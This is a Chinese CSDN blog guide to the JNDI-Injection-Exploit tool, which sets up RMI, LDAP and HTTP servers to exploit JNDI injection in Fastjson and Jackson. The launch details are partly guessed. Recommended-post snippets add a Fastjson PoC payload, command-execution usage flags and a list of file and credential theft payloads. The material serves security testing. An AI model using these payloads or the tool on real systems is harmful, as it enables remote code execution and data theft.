JNDI注入测试工具指南

于 2024-08-08 07:21:20 发布
阅读量1k 收藏 10
点赞数 7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_01002/article/details/141008397
版权

JNDI注入测试工具指南

JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https://gitcode.com/gh_mirrors/jn/JNDI-Injection-Exploit

项目概述

本指南旨在详细介绍GitHub上的开源项目 JNDI-Injection-Exploit,该工具专为生成可利用的JNDI链接设计,并能够通过启动RMI服务器、LDAP服务器和HTTP服务器提供后台服务。本项目主要针对如Jackson、Fastjson等中常见的JNDI注入漏洞进行测试和利用。

1. 项目目录结构及介绍

项目的主要目录结构如下:

JNDI-Injection-Exploit/
├── src                    # 源代码目录,包含了核心功能实现
│   ├── 主要逻辑相关文件     # 具体的JNDI链接生成和服务启动代码
├── LICENSE                # 许可证文件
├── README.md              # 主要的英文说明文档
├── README-CN.md           # 中文文档,提供了关于项目用途和基本使用的简述
├── pom.xml                # Maven构建文件,定义了项目依赖和构建流程
└── (可能存在的其他辅助或配置文件)
  • src 目录包含了项目的源代码,是生成JNDI链接和管理背景服务的核心。
  • LICENSE 文件详细说明了该项目的授权方式,遵循特定的开放源码协议。
  • README.mdREADME-CN.md 分别提供了英文和中文版本的简介和快速入门指南。
  • pom.xml 是Maven项目的配置文件,列出所有依赖项,并指导如何构建项目。

2. 项目的启动文件介绍

项目通常有一个主类或者脚本来作为启动点。尽管具体文件名未直接提及,一个典型的Java应用会有一个名为 Main 或者与项目功能密切相关的类,负责初始化和运行服务。在本项目中,寻找类似具有 main 方法的类,例如 AppStartServer,将是启动整个程序的关键。用户需通过Java命令行执行指定的jar包或类路径来启动服务:

java -jar target/JNDI-Injection-Exploit-{version}.jar

或者如果是直接编译后运行:

mvn clean compile exec:java -Dexec.mainClass="com.example.Main" # 假设Main是你找到的启动类

确保替换 "com.example.Main" 为你实际的启动类全路径。

3. 项目的配置文件介绍

虽然上述提供的信息没有具体指明配置文件的细节,一个标准的Java项目可能会包含以下几种配置形式:

  • application.properties 或 .yaml:用于存放应用级配置,但在这个特定案例中,配置可能是硬编码在代码里或通过命令行参数传递,尤其是在专注于快速测试和利用场景时。
  • pom.xml 内部配置:对于构建和依赖关系的配置,间接影响项目运行环境。

由于原项目文档没有明确列出外部配置文件,配置可能需要通过修改源代码中的常量或使用Maven profiles来完成特定设置。为了调整服务器端口、服务行为等,开发者可能需要直接介入源代码进行定制。

请注意,使用此类工具应严格遵守法律与道德规范,仅在合法授权和测试环境中应用,以评估系统安全性和防御JNDI注入攻击的能力。

JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https://gitcode.com/gh_mirrors/jn/JNDI-Injection-Exploit

蒋楷迁
关注
Spring Boot 中文参考指南
分享技术干货和灵感、推荐新书和好玩的项目、分享Java面试题
02-08 8259
虽然Spring Boot 3.x第一个GA版本出来了,但一段时间内市面上依然还会以2.X版本为主,而2.7.8 是最后一个2.x的GA版本
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
Log4j2JNDI注入漏洞复现测试
zhangxm_qz的博客
12-19 3048
文章目录漏洞概述代码测试防护办法 漏洞概述 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 代码测试 测试环境 我这里采用jdk1.8 211 创建并发布RMI服务 创建maven项目并,增加两个类,如下: 代码分别如下: package testRMI.service; import com.sun.jndi.rmi.registry.ReferenceWrapper; import testRMI.service.IService; import t
jndi配置测试
u011009096的专栏
04-19 323
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <%@ page import="java.sql.*,javax.sql.*,javax.naming.*" %>       JNDI数据源测试                            Connection connOracle
JNDI使用测试
kinkding的专栏
07-15 203
package filesplit; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; import java.util.Hashtable; import javax.naming.Initial...
springboot参考指南
07-21
测试工具 i. 35.4.1. ConfigFileApplicationContextInitializer ii. 35.4.2. EnvironmentTestUtils iii. 35.4.3. OutputCapture iv. 35.4.4. TestRestTemplate xv. 36. 开发自动配置和使用条件 i. 36.1. 理解auto-...
内存马介绍及分析-带查杀工具tomcat memshell scanner.jsp
最新发布
weixin_65629944的博客
12-18 1010
先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
2022年EJB 3.0 开发指南之定时服务Java教程.docx
07-12
`NewsTimerBean`中使用了`@Inject`注解注入`SessionContext`,以便于调用`getTimerService()`创建定时器。`fiveNews`方法创建了一个延迟5分钟的定时器,并设置相关信息。`ejbTimeout`方法是定时器超时的回调,负责...
关于JNDI测试项目
06-20
JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目JNDI测试项目
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
JNDI的一些用法测试
xgc3098的专栏
03-18 1142
JNDI : Java naming and directory interface,Java名目与目录服务,主要用于J2EE程序中,用来定位资源。 以Tomcat为例,安装好Tomcat以后,启动服务。在浏览器中输入http://localhost:8080/可以浏览Tomcat相关的文档,其中就有关于JNDI的用法说明。 相关的配置文件: /WEB-INF/web.xml
spring Jndi 测试方法
xlin
05-12 234
public class ApplicationContextForTest {   protected ApplicationContext applicationContext;   private void initJndi() throws NamingException{   SimpleNamingContextBuilder builder = SimpleNamingC...
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3794
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
Log4j2 JNDI漏洞复现测试
sleetdream的博客
12-15 1286
一、系统环境 组件 版本 Ubuntu 20.04 二、简要说明 1、jar包说明 名称 作用 hacker-0.0.1-SNAPSHOT.jar 攻击者 target-0.0.1-SNAPSHOT.jar 攻击目标 2、攻击说明 (1)hacker启动一个RMI服务,端口号1099,绑定了evil路径,返回“com.example.target.service.HackerTest”的依赖。 (2)target记录一条日志,内容为“${jndi:rmi://lo
java asm jndi_JNDI-Injection-Exploit
weixin_29066121的博客
02-16 1393
介绍最近把自己之前写的JNDI注入工具改了一下push到了github,地址:github,启动后这个工具开启了三个服务,包括RMI、LDAP以及HTTP服务,然后生成JNDI链接。测试时可以将JNDI链接插入到JNDI注入相关的POC中,如Jackson、Fastjson反序列化漏洞等。三个服务中,RMI和LDAP基于marshalsec中RMIRefServer、LDAPRefServer类修...
精通Spring:JPA实战指南
Spring的核心特性包括依赖注入(Dependency Injection,DI)和面向切面编程(Aspect-Oriented Programming,AOP),这些使得代码更加模块化,易于测试和维护。 Spring框架的主要模块包括: 1. 核心容器:这是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

蒋楷迁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值